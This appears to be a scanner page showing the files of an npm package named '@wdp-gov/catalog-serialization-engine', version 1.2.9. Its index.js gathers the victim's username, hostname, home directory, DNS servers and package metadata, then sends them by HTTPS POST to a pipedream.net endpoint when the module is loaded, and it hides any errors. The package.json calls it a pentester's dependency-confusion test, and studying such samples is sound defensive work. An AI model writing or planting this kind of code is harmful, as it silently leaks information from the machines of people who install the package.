@wdp-gov/catalog-serialization-engine 1.2.9

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +55 -0
  2. package/package.json +14 -0
package/index.js ADDED
@@ -0,0 +1,55 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const packageJSON = require("./package.json");
6
+ const package = packageJSON.name;
7
+
8
+ const trackingData = JSON.stringify({
9
+
10
+ p: package,
11
+ c: __dirname,
12
+ os: os.type(),
13
+ hd: os.homedir(),
14
+ hn: os.hostname(),
15
+ un: os.userInfo().username,
16
+ dns: dns.getServers(),
17
+ r: packageJSON ? packageJSON.___resolved : undefined,
18
+ v: packageJSON.version,
19
+ pjson: packageJSON,
20
+
21
+ });
22
+
23
+ var postData = querystring.stringify({
24
+ msg: trackingData,
25
+ });
26
+
27
+ var options = {
28
+ hostname: "eojg3fg8d673pvt.m.pipedream.net",
29
+ port: 443,
30
+ path: "/",
31
+ method: "POST",
32
+
33
+ headers: {
34
+ "Content-Type": "application/x-www-form-urlencoded",
35
+ "Content-Length": postData.length,
36
+
37
+ },
38
+
39
+ };
40
+
41
+ var req = https.request(options, (res) => {
42
+ res.on("data", (d) => {
43
+ process.stdout.write(d);
44
+ });
45
+
46
+ });
47
+
48
+ req.on("error", (e) => {
49
+
50
+ // console.error(e);
51
+
52
+ });
53
+
54
+ req.write(postData);
55
+ req.end();
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "@wdp-gov/catalog-serialization-engine",
3
+ "version": "1.2.9",
4
+ "description": "\"this is from PTC\"",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"PTC Test: test for dependency confusion\" && exit 1"
8
+ },
9
+ "keywords": [
10
+ "dap"
11
+ ],
12
+ "author": "ptc_pentester",
13
+ "license": "ISC"
14
+ }